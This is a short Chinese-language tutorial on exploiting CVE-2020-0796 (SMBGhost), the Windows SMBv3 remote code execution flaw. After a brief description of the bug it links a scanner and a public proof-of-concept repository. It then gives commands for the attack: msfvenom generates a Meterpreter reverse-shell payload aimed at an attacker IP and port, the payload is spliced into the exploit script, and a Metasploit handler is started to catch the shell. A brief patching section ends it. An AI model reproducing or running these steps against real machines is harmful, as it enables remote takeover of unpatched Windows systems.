漏洞介绍
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
漏洞发现
扫描有漏洞的IP
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
漏洞利用
1、EXP脚本下载,下载后,利用kali生成反弹shell的shellcode https://github.com/chompie1337/SMBGhost_RCE_PoC.git
// 20.143为Kali的IP
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.143 lport=4444 -f py -o exp.py
2、编辑 exp.py文件,将buf替换成USER_PAYLOAD
3、再打开exploit.py,将USER_PAYLOAD部分全部替换成 exp.py口的USER_PAYLOAD部分,如图红框内全部替换
4、打开msf,监听本地kali 4444端口,设置本地kali的IP
root@kali:~# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.20.143
run
5、运行exploit.py脚本,反弹shell
6、此时,已经获取到shell
另一台:
修复方法
1、使用系统自带的windows update补丁更新服务,更新微软漏洞补丁(慢);
2、使用360 、腾讯管家等工具修复漏洞(建议);
如长期未更新过,可能需要 更新完、重启、再更新、再重启,操作多次 ,因为有些补丁有依赖关系。